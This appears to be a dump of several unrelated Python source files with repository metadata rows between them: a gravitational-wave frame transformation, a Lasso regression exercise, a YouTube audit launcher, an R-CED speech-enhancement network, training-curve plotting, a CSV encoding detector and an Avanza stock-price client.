frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max, = _process_transformation_kwargs(
self.ell_max, **kwargs
)
n_theta = 2 * working_ell_max + 1
n_phi = n_theta
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Make this into a Modes object, so it can keep track of its spin weight, etc., through the
# various operations needed below.
supertranslation = sf.Modes(supertranslation, spin_weight=0).real
# This is a 2-d array of unit quaternions, which are what the spin-weighted functions should be
# evaluated on (even for spin 0 functions, for simplicity). That will be equivalent to
# evaluating the spin-weighted functions with respect to the transformed grid -- although on the
# original time slices.
distorted_grid_rotors = boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi)
# Compute u, α, ðα, ððα, k, ðk/k, 1/k, and 1/k³ on the distorted grid, including new axes to
# enable broadcasting with time-dependent functions. Note that the first axis should represent
# variation in u, the second axis variation in θ', and the third axis variation in ϕ'.
u = self.u
α = sf.Grid(supertranslation.evaluate(distorted_grid_rotors), spin_weight=0).real[np.newaxis, :, :]
# The factors of 1/sqrt(2) and 1/2 come from using the GHP eth instead of the NP eth.
ðα = sf.Grid(supertranslation.eth.evaluate(distorted_grid_rotors)/np.sqrt(2), spin_weight=α.s + 1)[np.newaxis, :, :]
ððα = sf.Grid(0.5*supertranslation.eth.eth.evaluate(distorted_grid_rotors), spin_weight=α.s + 2)[np.newaxis, :, :]
k, ðk_over_k, one_over_k, one_over_k_cubed = conformal_factors(boost_velocity, distorted_grid_rotors)
# ðu'(u, θ', ϕ') exp(iλ) / k(θ', ϕ')
ðuprime_over_k = ðk_over_k * (u - α) - ðα
# ψ0(u, θ', ϕ') exp(2iλ)
ψ0 = sf.Grid(self.psi0.evaluate(distorted_grid_rotors), spin_weight=2)
# ψ1(u, θ', ϕ') exp(iλ)
ψ1 = sf.Grid(self.psi1.evaluate(distorted_grid_rotors), spin_weight=1)
# ψ2(u, θ', ϕ')
ψ2 = sf.Grid(self.psi2.evaluate(distorted_grid_rotors), spin_weight=0)
# ψ3(u, θ', ϕ') exp(-1iλ)
ψ3 = sf.Grid(self.psi3.evaluate(distorted_grid_rotors), spin_weight=-1)
# ψ4(u, θ', ϕ') exp(-2iλ)
ψ4 = sf.Grid(self.psi4.evaluate(distorted_grid_rotors), spin_weight=-2)
# σ(u, θ', ϕ') exp(2iλ)
σ = sf.Grid(self.sigma.evaluate(distorted_grid_rotors), spin_weight=2)
### The following calculations are done using in-place Horner form. I suspect this will be the
### most efficient form of this calculation, within reason. Note that the factors of exp(isλ)
### were computed automatically by evaluating in terms of quaternions.
#
fprime_of_timenaught_directionprime = np.empty((6, self.n_times, n_theta, n_phi), dtype=complex)
# ψ0'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += 6 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ1
fprime_temp *= ðuprime_over_k
fprime_temp += ψ0
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[0] = fprime_temp
# ψ1'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += 3 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += -3 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += ψ1
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[1] = fprime_temp
# ψ2'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -2 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += ψ2
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[2] = fprime_temp
# ψ3'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += ψ3
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[3] = fprime_temp
# ψ4'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[4] = fprime_temp
# σ'(u, θ', ϕ')
fprime_temp = σ.copy()
fprime_temp -= ððα
fprime_temp *= one_over_k
fprime_of_timenaught_directionprime[5] = fprime_temp
# Determine the new time slices. The set timeprime is chosen so that on each slice of constant
# u'_i, the average value of u=(u'/k)+α is precisely <u>=u'γ+<α>=u_i. But then, we have to
# narrow that set down, so that every grid point on all the u'_i' slices correspond to data in
# the range of input data.
timeprime = (u - sf.constant_from_ell_0_mode(supertranslation[0]).real) / γ
timeprime_of_initialtime_directionprime = k * (u[0] - α)
timeprime_of_finaltime_directionprime = k * (u[-1] - α)
earliest_complete_timeprime = np.max(timeprime_of_initialtime_directionprime.view(np.ndarray))
latest_complete_timeprime = np.min(timeprime_of_finaltime_directionprime.view(np.ndarray))
timeprime = timeprime[(timeprime >= earliest_complete_timeprime) & (timeprime <= latest_complete_timeprime)]
# This will store the values of f'(u', θ', ϕ') for the various functions `f`
fprime_of_timeprime_directionprime = np.zeros((6, timeprime.size, n_theta, n_phi), dtype=complex)
# Interpolate the various transformed function values on the transformed grid from the original
# time coordinate to the new set of time coordinates, independently for each direction.
for i in range(n_theta):
for j in range(n_phi):
k_i_j = k[0, i, j]
α_i_j = α[0, i, j]
# u'(u, θ', ϕ')
timeprime_of_timenaught_directionprime_i_j = k_i_j * (u - α_i_j)
# f'(u', θ', ϕ')
fprime_of_timeprime_directionprime[:, :, i, j] = CubicSpline(
timeprime_of_timenaught_directionprime_i_j, fprime_of_timenaught_directionprime[:, :, i, j], axis=1
)(timeprime)
# Finally, transform back from the distorted grid to the SWSH mode weights as measured in that
# grid. I'll abuse notation slightly here by indicating those "distorted" mode weights with
# primes, so that f'(u')_{ℓ', m'} = ∫ f'(u', θ', ϕ') sȲ_{ℓ', m'}(θ', ϕ') sin(θ') dθ' dϕ'
abdprime = type(self)(timeprime, output_ell_max)
# ψ0'(u')_{ℓ', m'}
abdprime.psi0 = spinsfast.map2salm(fprime_of_timeprime_directionprime[0], 2, output_ell_max)
# ψ1'(u')_{ℓ', m'}
abdprime.psi1 = spinsfast.map2salm(fprime_of_timeprime_directionprime[1], 1, output_ell_max)
# ψ2'(u')_{ℓ', m'}
abdprime.psi2 = spinsfast.map2salm(fprime_of_timeprime_directionprime[2], 0, output_ell_max)
# ψ3'(u')_{ℓ', m'}
abdprime.psi3 = spinsfast.map2salm(fprime_of_timeprime_directionprime[3], -1, output_ell_max)
# ψ4'(u')_{ℓ', m'}
abdprime.psi4 = spinsfast.map2salm(fprime_of_timeprime_directionprime[4], -2, output_ell_max)
# σ'(u')_{ℓ', m'}
abdprime.sigma = spinsfast.map2salm(fprime_of_timeprime_directionprime[5], 2, output_ell_max)
return abdprime
| 51.025581 | 120 | 0.675995 |
56aef9f2caa5da1995f4cc5db7b227a6ada7a1f1 | 1,426 | py | Python | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Lasso Regression
Train a Lasso regression, with alpha = 1 and using the leave
one out method for cross validation. The data used to train
and test the regression is the data from the reg01.csv file.
File
-------
question3.py
Author
-------
Lucas Haug <[email protected]>
"""
from data import get_data
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import LeaveOneOut
import numpy as np
def main():
x_data, y_data = get_data("data/reg01.csv")
cv = LeaveOneOut()
rmse_train = []
rmse_test = []
for train_index, test_index in cv.split(x_data):
# Split data
x_train, x_test = x_data[train_index, :], x_data[test_index, :]
y_train, y_test = y_data[train_index], y_data[test_index]
# Fit model
model = Lasso(alpha=1.0)
model.fit(x_train, y_train)
# Evaluate model
train_predict = model.predict(x_train)
test_predict = model.predict(x_test)
# Calculate rmse
rmse_train.append(mean_squared_error(y_train, train_predict, squared=False))
rmse_test.append(mean_squared_error(y_test, test_predict, squared=False))
print("Root Mean Squared Errors:")
print(f"Mean Train RMSE: {np.mean(rmse_train) : .2f}")
print(f"Mean Test RMSE: {np.mean(rmse_test) : .2f}")
if __name__ == "__main__":
main()
| 25.017544 | 84 | 0.679523 |
d989ad5e6cb3ff4525ade53c3e072690dd4702f6 | 664 | py | Python | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | 1 | 2021-05-13T12:08:43.000Z | 2021-05-13T12:08:43.000Z | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | null | null | null | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | 1 | 2021-09-04T01:28:38.000Z | 2021-09-04T01:28:38.000Z | #!/usr/bin/python
import sys
from modules.YouTubeSearch import YouTubeSearchAudit
import os
os.chdir('../')
"""
Initialize variables
"""
# Read User Profile
USER_PROFILE = sys.argv[1]
# Read Search Term
# TODO: Make sure that you replace spaces ' ' with '_' when providing the search term to this script
# E.g., flat earth -> flat_earth
SEARCH_TERM = sys.argv[2].replace('_', ' ').lower()
"""
Create a YouTube Search Audit object for the given User
"""
YOUTUBE_SEARCH_AUDIT_MODULE = YouTubeSearchAudit(user_profile=USER_PROFILE, search_term=SEARCH_TERM)
# Start YouTube Search Audit Experiment
YOUTUBE_SEARCH_AUDIT_MODULE.perform_audit()
sys.exit(0)
| 23.714286 | 100 | 0.75 |
eb28e4d341215039d8e158bdb8efe91a0d472303 | 4,988 | py | Python | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 66 | 2018-07-06T07:07:56.000Z | 2021-07-30T07:59:54.000Z | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 7 | 2018-09-01T03:03:14.000Z | 2019-11-04T10:51:04.000Z | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 15 | 2018-07-03T13:47:26.000Z | 2021-10-17T04:26:13.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Ke Wang
"""Redundant Convolutional Encoder Decoder (R-CED)
A fully convolutional neural network for speech enhancement (https://arxiv.org/pdf/1609.07132).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from tensorflow.contrib.layers import xavier_initializer, l2_regularizer
from tensorflow.contrib.layers import batch_norm, fully_connected
class RCED(object):
def __init__(self, rced):
self.rced = rced
def __call__(self, inputs, labels, reuse=False):
"""Build CNN models. On first pass will make vars."""
self.inputs = inputs
self.labels = labels
outputs = self.infer(reuse)
return outputs
def infer(self, reuse):
rced = self.rced
activation_fn = tf.nn.relu
is_training = True
input_dim = rced.input_dim
left_context = rced.left_context
right_context = rced.right_context
splice_dim = left_context + 1 + right_context
in_dims = self.inputs.get_shape().as_list()
if len(in_dims) == 2:
# shape format [batch, width]
dims = self.inputs.get_shape().as_list()
assert dims[0] == rced.batch_size
inputs = tf.reshape(self.inputs, [dims[0], splice_dim, input_dim])
inputs = tf.expand_dims(inputs, -1)
elif len(in_dims) == 3:
# shape format [batch, length, width]
dims = self.inputs.get_shape().as_list()
assert dims[0] == 1
inputs = tf.squeeze(self.inputs, [0])
inputs = tf.reshape(self.inputs, [-1, splice_dim, input_dim])
inputs = tf.expand_dims(inputs, -1)
# If test of cv , BN should use global mean / stddev
if rced.cross_validation:
is_training = False
with tf.variable_scope('g_model') as scope:
if reuse:
scope.reuse_variables()
if rced.batch_norm:
normalizer_fn = batch_norm
normalizer_params = {
"is_training": is_training,
"scale": True,
"renorm": True
}
else:
normalizer_fn = None
normalizer_params = None
if rced.l2_scale > 0.0 and is_training:
weights_regularizer = l2_regularizer(rced.l2_scale)
else:
weights_regularizer = None
keep_prob = 1.0
if not reuse:
print("*** Generator summary ***")
print("G inputs shape: {}".format(inputs.get_shape()))
# inputs format [batch, in_height, in_width, in_channels]
# filters format [filter_height, filter_width, in_channels, out_channels]
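            # Symmetric encoder-decoder: channel counts grow toward a 32-filter bottleneck and then
            # mirror back down, while filter widths narrow toward the middle layers.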
filters_num = [12, 16, 20, 24, 32, 24, 20, 16, 12]
filters_width = [13, 11, 9, 7, 7, 7, 9, 11, 13]
            assert len(filters_num) == len(filters_width)
for i in range(len(filters_num)):
inputs = tf.contrib.layers.conv2d(inputs, filters_num[i],
[splice_dim, filters_width[i]],
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params,
weights_initializer=xavier_initializer(),
weights_regularizer=weights_regularizer,
biases_initializer=tf.zeros_initializer())
if not reuse:
print("Conv{} layer output shape: {}".format(
i+1, inputs.get_shape()), end=" *** ")
self.nnet_info(normalizer_fn, rced.keep_prob, weights_regularizer)
# Linear output
# inputs = tf.reshape(inputs, [rced.batch_size, -1])
inputs = tf.reshape(inputs, [-1, splice_dim * input_dim * filters_num[-1]])
y = fully_connected(inputs, rced.output_dim,
activation_fn=None,
weights_initializer=xavier_initializer(),
weights_regularizer=weights_regularizer,
biases_initializer=tf.constant_initializer(0.1))
if not reuse:
print("G output shape: {}".format(y.get_shape()))
sys.stdout.flush()
return y
def nnet_info(self, batch_norm, keep_prob, weights_regularizer):
if batch_norm is not None:
print("use batch normalization", end=" *** ")
if keep_prob != 1.0:
print("keep prob is {}".format(keep_prob),
end=" *** ")
if weights_regularizer is not None:
print("L2 regularizer scale is {}".format(self.rced.l2_scale),
end=" *** ")
print()
| 37.787879 | 94 | 0.558941 |
0ab8213d0daa1a1d193806451a93bd00fd587fc8 | 192 | py | Python | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
] | null | null | null | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
] | null | null | null | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
] | null | null | null | total = 0
count = 0
while True:
num = input("入力してください。:")
if num == "End":
break
total += int(num)
count += 1
print(str(count)+"回入力しました。")
print("合計は"+str(total)+"です。") | 19.2 | 29 | 0.546875 |
deca6e26c03dd6334482e5251a0c4154237542ea | 4,731 | py | Python | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | 8 | 2017-02-19T20:19:18.000Z | 2020-05-23T03:06:08.000Z | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | null | null | null | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | 5 | 2017-04-07T14:35:11.000Z | 2020-03-12T19:11:16.000Z | import numpy as np
import os
import cPickle as pickle
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
color_set = "Set1"
sns.set(style="white", palette=color_set)
colors = sns.color_palette(color_set)
def plot(xp_dir, export_pdf, show):
if os.path.exists('{}/log_mnist.txt'.format(xp_dir)):
dataset = 'mnist'
elif os.path.exists('{}/log_cifar10.txt'.format(xp_dir)):
dataset = 'cifar10'
elif os.path.exists('{}/log_cifar100.txt'.format(xp_dir)):
dataset = 'cifar100'
else:
raise NotImplementedError('Could not find appropriate log file in {}'
.format(xp_dir))
fig = plt.figure(figsize=(12, 6))
matplotlib.rcParams.update({'font.size': 13})
matplotlib.rc('xtick', labelsize=10)
nb = 0
for solver in ["adagrad", "adadelta", "adam"]:
sns.set(style="white", palette=color_set)
ax1 = fig.add_subplot(231 + nb)
sns.set(style="white", palette=color_set)
ax2 = fig.add_subplot(234 + nb)
nb += 1
base = pickle.load(open("%s/%s_%s_svm_results.p" %
(xp_dir, dataset, solver), "rb"))
lwsvm = pickle.load(open("%s/%s_%s_svm_lwsvm_results.p" %
(xp_dir, dataset, solver), "rb"))
start_epoch = base['save_at']
# join end of SGD and beginning of LWSVM
lwsvm['time_stamp'] = np.array([0] + lwsvm['time_stamp']) / 3600. + \
base['time_stamp'][start_epoch] / 3600.
base['time_stamp'] = np.array(base['time_stamp']) / 3600.
lwsvm['train_objective'] = [base['train_objective'][start_epoch]] + \
lwsvm['train_objective']
lwsvm['train_accuracy'] = [base['train_accuracy'][start_epoch]] + \
lwsvm['train_accuracy']
lwsvm['val_accuracy'] = [base['val_accuracy'][start_epoch]] + \
lwsvm['val_accuracy']
# find stop index for SGD (index of SGD where LWSVM stops)
try:
stop = [i for i in range(len(base['time_stamp']))
if base['time_stamp'][i] > lwsvm['time_stamp'][-1]][0]
except:
stop = -1
stop = -1
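        # stop is forced back to -1 below, overriding the index computed above.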
# don't display first epochs (scaling reasons)
start = 0
train_objective1, = \
ax1.plot(base['time_stamp'][start: start_epoch],
base['train_objective'][start: start_epoch],
label="%s" % solver.title())
train_objective2, = \
ax1.plot(lwsvm['time_stamp'],
lwsvm['train_objective'],
label="LW_SVM")
ax1_handles = [train_objective1, train_objective2]
ax1.plot(base['time_stamp'][start: stop],
base['train_objective'][start: stop],
color=colors[0], alpha=0.5)
train_accuracy1, = \
ax2.plot(base['time_stamp'][start: start_epoch],
base['train_accuracy'][start: start_epoch],
label="Training %s" % solver.title())
train_accuracy2, = \
ax2.plot(lwsvm['time_stamp'], lwsvm['train_accuracy'],
label="Training LW-SVM")
val_accuracy1, = \
ax2.plot(base['time_stamp'][start: start_epoch],
base['val_accuracy'][start: start_epoch],
label="Validation %s" % solver.title())
val_accuracy2, = \
ax2.plot(lwsvm['time_stamp'],
lwsvm['val_accuracy'],
label="Validation LW-SVM")
ax2_handles = [train_accuracy1, train_accuracy2,
val_accuracy1, val_accuracy2]
ax2.plot(base['time_stamp'][start: stop],
base['train_accuracy'][start: stop],
color=colors[0], alpha=0.5)
ax2.plot(base['time_stamp'][start: stop],
base['val_accuracy'][start: stop],
color=colors[2], alpha=0.5)
ax1.legend(handles=ax1_handles)
ax2.legend(handles=ax2_handles, loc=4)
if dataset == "mnist":
ax1.set_ylim([0.02, 0.1])
ax2.set_ylim([96, 100])
if dataset == "cifar10":
ax1.set_ylim([0, 0.15])
ax2.set_ylim([45, 101])
if dataset == "cifar100":
ax1.set_ylim([0, 0.4])
ax2.set_ylim([0, 101])
if solver == "adagrad":
ax2.set_ylabel("Accuracy (%)")
ax1.set_ylabel("Training Objective Function")
if solver == "adadelta":
ax2.set_xlabel("Time (h)")
if export_pdf:
plt.savefig(export_pdf, bbox_inches='tight', pad_inches=0)
if show:
plt.show()
| 34.786765 | 77 | 0.544917 |
8ebb59e3110d45ea7448ac2d1a9172aba8ee2908 | 8,393 | py | Python | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | 8 | 2018-03-10T05:33:58.000Z | 2019-01-25T08:32:27.000Z | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | null | null | null | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | 6 | 2018-10-15T17:07:28.000Z | 2019-02-03T21:49:54.000Z | #!/usr/bin/env python3
# 2019/01/07: Class Created
# Status: Work-In-Progress
# - Refactored + minor updates. Code paths need re-testing.
import os.path
import csv
class Inspector:
'''
    Line oriented: A field-independent way to scan for the
    encoding + successful reading of a partial / complete,
textual, data-file.
'''
ENCODINGS = (None, 'utf-8', 'utf-16')
@staticmethod
def _count_lines(fh, line_max=-1):
''' internal use only '''
tally = 0
bokay = False
if fh:
try:
for line in fh:
tally += 1
if line_max >= 0:
if tally >= line_max:
break
bokay = True
except:
pass
return tally, bokay
@staticmethod
def Tally(fqfile, line_max=-1):
'''
Check to see how many lines (#) are in a data-file.
The 2nd result is the file encoding. None = Classic / ASCII encoding.
The 3rd result is boolean. Indicates if the file was read completely ('toeof.')
Use line_max to prevent huge line-scans.
Safe function - no exceptions are thrown.
Result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
rtype = None
zmax = 0
bokay = False
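        # Try each candidate encoding and keep the one that successfully reads the most lines.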
for ztype in Inspector.ENCODINGS:
try:
fh = open(fqfile, 'r', encoding=ztype)
count = Inspector._count_lines(fh, line_max)
if count[0] > zmax:
zmax = count[0]
bokay = count[1]
rtype = ztype
except:
try:
                    fh.close()
except:
pass
finally:
try:
                    fh.close()
except:
pass
results = zmax, rtype, bokay
return results
class InspectorCSV:
'''
What to do when the user selects 'csv,' but things go boom.
Emphasis is upon Unicode detection + data-file conversion / re-writing
to a FIXED_TAB or FIXED_PIPE format.
'''
FIXED_TAB = ("\t", ".fxtab")
FIXED_PIPE = ("|", ".fxpip")
@staticmethod
def _encode(dlct):
''' internal use only '''
if not dlct:
return dict()
pie = dlct()
return {
"delimiter":pie.delimiter,
"doublequote":pie.doublequote,
"doublequote":pie.doublequote,
"quotechar":pie.quotechar,
"skipinitialspace":pie.skipinitialspace,
"quoting":pie.quoting,
"lineterminator":pie.lineterminator
}
@staticmethod
def Detect(fqfile, max_lines=20):
'''
Detect file type, as well as how many lines can be read from same.
Exception on error, else tuple with number read (#,) and encoding.
        Successful result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
if not fqfile:
raise Exception("Input file is 'None'")
if not os.path.exists(fqfile):
raise Exception("Input file not found")
max_read = 0
encoding = None
bokay = False
fh = None
for ztype in Inspector.ENCODINGS:
try:
result = 0
fh = open(fqfile, encoding=ztype)
result = Inspector._count_lines(fh, line_max=max_lines)
if result[0] > max_read:
max_read = result[0]
bokay = result[1]
encoding = ztype
except:
if fh:
try:
fh.close()
except:
pass
continue # Next encoding!
results = max_read, encoding, bokay
return results
@staticmethod
def Sniff(fqfile, max_lines=20):
'''
        Use the CSV Sniffer. Will not work on piped data.
        Returns the stringified dialect detected, or None.
No exceptions are thrown.
        Successful result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
if not fqfile:
return None
popSel = dict()
bokay = False
fh = None
for ztype in Inspector.ENCODINGS:
try:
pop = dict()
result = 0
fh = open(fqfile, 'r', encoding=ztype)
zcount = Inspector._count_lines(fh, line_max=max_lines)
try:
fh.close()
except:
pass
if not zcount[0]: # no lines
continue
if not zcount[1]: # no completion
continue
total = max_lines
if total > zcount[0]:
total = zcount[0]
sn = csv.Sniffer()
fh = open(fqfile, 'r', encoding=ztype)
for ss, line in enumerate(fh):
if ss > total:
break
zdlg = sn.sniff(line)
if zdlg:
code = str(InspectorCSV._encode(zdlg))
if code in pop:
pop[code] = pop[code] + 1
else:
pop[code] = 1
fh.close()
popSel = pop
bokay = True
except Exception as ex:
bokay = False
continue
finally:
if fh:
try:
fh.close()
except:
pass
zmax = 0
result = None
for key in popSel:
if popSel[key] > zmax:
zmax = popSel[key]
result = key
return zmax, result, bokay
@staticmethod
def Convert(fqfile, sep=FIXED_PIPE):
'''
Copy a data-file using a unified delimiter + factorized file-type suffix.
Exception on error, else tuple with total lines (#), encoding, and result-file name.
        Successful result examples:
(#, None, fq_output) = Default encoding (classic bytes)
(#, 'utf-8', fq_output) = Unicode encoding (8 / 16 supported)
'''
try:
tr = InspectorCSV.Detect(fqfile)
pig = fqfile + sep[1]
if os.path.exists(pig):
os.unlink(pig)
            fh = open(fqfile, 'r', encoding=tr[1])  # use the encoding detected above
if tr[1]:
pig = fqfile + '.' + tr[1] + sep[1]
fout = open(pig, 'w', encoding=tr[1])
else:
fout = open(pig, 'w')
lines = csv.reader(fh)
for ss, line in enumerate(lines, 1):
print(*line,sep=sep[0], file=fout)
max_read = ss
encoding = tr[1]
if ss >= tr[0]:
return max_read, encoding, pig
raise Exception("Partial file read: {}/{}".format(ss,tr[0]))
except Exception as ex:
raise(ex)
finally:
try:
                fh.close()
                fout.close()
except:
pass
raise Exception("File format error.")
if __name__ == "__main__":
#R-n-D: Please ignore.
#file = '../../../PyDAO-Student-Stats/RawData/Udemy/Py1200_Practice_2019-01-08_10-33-57.csv'
#print(InspectorCSV.Convert(file, InspectorCSV.FIXED_TAB))
file = '../DaoTest01/nasdaqlisted.txt'
#print(InspectorCSV.Sniff(file))
print(Inspector.Tally(file))
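    # Hedged sketch (added; not in the original R-n-D block): the InspectorCSV
    # helpers would be exercised the same way on 'file' above; the calls stay
    # commented out so this ad-hoc test section keeps its original behavior.
    #print(InspectorCSV.Detect(file, max_lines=20))
    #print(InspectorCSV.Sniff(file, max_lines=20))
    #print(InspectorCSV.Convert(file, InspectorCSV.FIXED_PIPE))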
| 32.657588 | 97 | 0.454426 |
59a3797945b4c7727a66b8dee81fa15ee4101a62 | 3,939 | py | Python | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 3 | 2021-08-23T16:47:22.000Z | 2021-11-19T12:41:19.000Z | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 14 | 2021-08-28T14:17:50.000Z | 2021-11-28T20:12:54.000Z | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 1 | 2021-11-04T06:51:32.000Z | 2021-11-04T06:51:32.000Z | from zoneinfo import ZoneInfo
import requests
from datetime import datetime
from typing import Optional, Mapping
from investmentstk.data_feeds.data_feed import DataFeed, TimeResolution
from investmentstk.models.bar import Bar
from investmentstk.models.barset import BarSet
from investmentstk.models.price import Price
from investmentstk.persistence.requests_cache import requests_cache_configured
TIME_RESOLUTION_TO_AVANZA_API_RESOLUTION_MAP = {
TimeResolution.day: "day",
TimeResolution.week: "week",
TimeResolution.month: "month",
}
TIME_RESOLUTION_TO_AVANZA_API_TIME_RANGE_MAP = {
TimeResolution.day: "one_year",
TimeResolution.week: "three_years",
TimeResolution.month: "infinity",
}
class AvanzaFeed(DataFeed):
"""
A client to retrieve data from Avanza
A simpler implementation, and inspired by:
* https://github.com/Qluxzz/avanza/blob/master/avanza/avanza.py
* https://github.com/alrevuelta/avanzapy/blob/master/avanzapy/avanzapy.py
"""
@requests_cache_configured()
def _retrieve_bars(
self,
source_id: str,
*,
resolution: TimeResolution = TimeResolution.day,
instrument_type: Optional[str] = "stock",
) -> BarSet:
"""
Uses the same public API used by their public price page.
Example: https://www.avanza.se/aktier/om-aktien.html/5269/volvo-b
:param source_id: the internal ID used in Avanza
:param instrument_type:
:return: a BarSet
"""
response = requests.get(
f"https://www.avanza.se/_api/price-chart/{instrument_type}/{source_id}",
params={
"timePeriod": TIME_RESOLUTION_TO_AVANZA_API_TIME_RANGE_MAP[resolution],
"resolution": TIME_RESOLUTION_TO_AVANZA_API_RESOLUTION_MAP[resolution],
},
)
response.raise_for_status()
bars: BarSet = set()
data = response.json()
for ohlc in data["ohlc"]:
bars.add(self._ohlc_to_bar(ohlc))
return bars
@requests_cache_configured()
def retrieve_asset_name(self, source_id: str, instrument_type: Optional[str] = "stock") -> str:
"""
Retrieves the name of an asset
:param source_id: the internal ID used in Avanza
:param instrument_type:
:return: the asset name (ticker)
"""
response = requests.get(f"https://www.avanza.se/_mobile/market/{instrument_type}/{source_id}")
response.raise_for_status()
return response.json()["tickerSymbol"]
def retrieve_price(self, source_id: str, instrument_type: Optional[str] = "stock") -> Price:
response = requests.get(f"https://www.avanza.se/_mobile/market/{instrument_type}/{source_id}")
response.raise_for_status()
data = response.json()
return Price(last=data["lastPrice"], change=data["change"], change_pct=data["changePercent"])
@classmethod
def _ohlc_to_bar(cls, ohlc: Mapping) -> Bar:
"""
Converts a bar OHLC representation from Avanza into our
representation.
"""
"""
Timestamps from Avanza come in CET time. When retrieving daily bars,
a bar for the close of the day 2021-09-03 will be 1630620000000,
which is "Friday, September 3, 2021 12:00:00 AM GMT+02:00 DST".
If I treat that as a UTC timestamp, I get "Thursday, September 2, 2021 10:00:00 PM",
which is the day before.
However, I had issues with pandas when I tried to create a dataframe
with a timezone aware datetime, so I drop the timezone info.
"""
local_tz = ZoneInfo("Europe/Stockholm")
return Bar(
time=datetime.fromtimestamp(ohlc["timestamp"] / 1000, tz=local_tz).replace(tzinfo=None),
open=ohlc["open"],
high=ohlc["high"],
low=ohlc["low"],
close=ohlc["close"],
)
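# --- Hedged usage sketch (added; not part of the original module) ------------
# Illustrative only: "5269" is the Volvo B id taken from the docstring example
# above, and these calls hit Avanza's public endpoints, so network access and a
# still-valid instrument id are assumed.
if __name__ == "__main__":
    feed = AvanzaFeed()
    print(feed.retrieve_asset_name("5269"))
    print(feed.retrieve_price("5269"))
    print(len(feed._retrieve_bars("5269", resolution=TimeResolution.day)), "daily bars")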
| 33.666667 | 102 | 0.65575 |
